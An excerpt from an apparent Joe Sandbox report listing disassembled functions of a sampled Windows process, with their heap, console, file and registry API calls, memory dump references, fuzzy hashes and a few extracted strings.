                                        • Instruction ID: 7fe8b07715b12a3b8351a958f3a9b0fb77b3244cf8d78721bf89ea32230b32a1
                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction Fuzzy Hash: 94216061B0DA8286EB44AF6698142B8BBA1EB59B54F948035CF2E47355EE2C9546C320
                                        Function 00007FF7CD48B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6D0
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6E7
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B701
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B715
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocSize
                                        • String ID:
                                        • API String ID: 2549470565-0
                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction ID: a3f1c9c1b5cbb9d0eebe271c596b3d5fa62c19b627716f346d4fd7b9c8465a63
                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction Fuzzy Hash: 4221EE25B0DB4296EE14AF55E444078FAA1FB89B90BC89431DF2E43754EF3CE645C720
                                        Function 00007FF7CD4ACFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD01C
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD033
                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD06D
                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD07F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                        • String ID:
                                        • API String ID: 1033415088-0
                                        • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                        • Instruction ID: aea0590ab00d6067e7520ea96dea17e0fdff5b429ea3c906c4d16d1ec0f99ad5
                                        • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                        • Instruction Fuzzy Hash: ED118E3171CA4286DA049F21F40417AF7A1FB9ABA5F805135EF9E47B58EF3CD1458B10
                                        Function 00007FF7CD4859E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD485A2E
                                        • _open_osfhandle.MSVCRT ref: 00007FF7CD485A4F
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A37AA
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7CD4A37D2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                        • String ID:
                                        • API String ID: 22757656-0
                                        • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                        • Instruction ID: dfcb5fe0f9e88ef22c5f85d5ba43650d8f8e0a9ab32d165f229dac82307f994f
                                        • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                        • Instruction Fuzzy Hash: 04114F71B18A4597E7105F54A448379BAA1E789B74F948334DB3E473D0EF3CD5458B10
                                        Function 00007FF7CD4A5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56C5
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A56D9
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56FD
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A5711
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                        • Instruction ID: af4b323460223be10d2c26af31a9af36ccaed972897ebd0604b1af1e724792bf
                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                        • Instruction Fuzzy Hash: B9113672A08B81D6EB009F56E4040ACBBB1FB9DF94B888125DF5E03718EF38E556C750
                                        Function 00007FF7CD499158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                        • Instruction ID: 0e03c8e30732d54e189a89c105357eb63b0b6d5c57af0e31462d7a81c71f7175
                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                        • Instruction Fuzzy Hash: D4210435A0CF81A1E648AF45E8803A9B3A4FB98764F9000B5DF9E02764EF3DE244C720
                                        Function 00007FF7CD494AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD49EE64
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD49EE78
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                        • String ID:
                                        • API String ID: 2759988882-0
                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                        • Instruction ID: 6d20212b7ae7292d5a836c2b3755dee44da18ecd182ecb8080b9a28457865297
                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                        • Instruction Fuzzy Hash: ECF0EC61B1DA4296EF14AFA69418578F9D2EF8EB61B88D434CE1E42350FE3CA6458720
                                        Function 00007FF7CD4AF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID:
                                        • API String ID: 1606018815-0
                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                        • Instruction ID: c5326dbcd0ed2341e9425964785f693da3a06a48f324f9f361c8b445caa782d6
                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                        • Instruction Fuzzy Hash: FBF01232628A41DBD7446F51E444179FA61FB9AB12FC49234DF1F02394EF3CD1048B50
                                        Function 00007FF7CD48E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                          • Part of subcall function 00007FF7CD48EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F000
                                          • Part of subcall function 00007FF7CD48EF40: wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F031
                                          • Part of subcall function 00007FF7CD48EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        • longjmp.MSVCRT ref: 00007FF7CD49CCBC
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49CCE0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 3282654869-1994581435
                                        • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                        • Instruction ID: 247b7cf75413e08d0bf9d7e351be7a7958aa548fc5d955f220deba0a1ae0b138
                                        • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                        • Instruction Fuzzy Hash: 3561FE71B0D64282FA14AF629854979E6A1AF85BF4FD44534CF3D4B6E0FE3EE6408720
                                        Function 00007FF7CD4B10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7CD4A827A), ref: 00007FF7CD4B11DC
                                        • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7CD4A827A), ref: 00007FF7CD4B1277
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcessmemmovewcschr
                                        • String ID: &()[]{}^=;!%'+,`~
                                        • API String ID: 1135967885-381716982
                                        • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                        • Instruction ID: d9c82a8e0cc06e3d90579ff587682818f06fa1c89092a3b4bb5f985b1cbb7a00
                                        • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                        • Instruction Fuzzy Hash: 5B71FB71B0C642D6E760AF56E440679F6E4FBA47A4F801236CF6D83B94EF3CA6418B10
                                        Function 00007FF7CD4B08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memmovewcsncmp
                                        • String ID: 0123456789
                                        • API String ID: 3879766669-2793719750
                                        • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                        • Instruction ID: cd7d170421b97c3e52e6fb99fa62839e300b0594cfa4723fa2fdc59e31194015
                                        • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                        • Instruction Fuzzy Hash: E7412922F1CB8692EA24AF66D4006BAB354FB69BE1F845531CF2E43784FE3CD6408354
                                        Function 00007FF7CD4A9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4A97D0
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4A98D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                        • String ID: Software\Classes
                                        • API String ID: 2714550308-1656466771
                                        • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                        • Instruction ID: 446b35bd630d715b6ad717296ab75846a5812bd7c60eed553b7c6f5dc16b0daf
                                        • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                        • Instruction Fuzzy Hash: FE418D22B1DB5281EA00AF16D445439A3A5FB84BE0BD08135DF6E4B7E5FF39DA46C350
                                        Function 00007FF7CD4AA0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AA0FC
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AA1FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
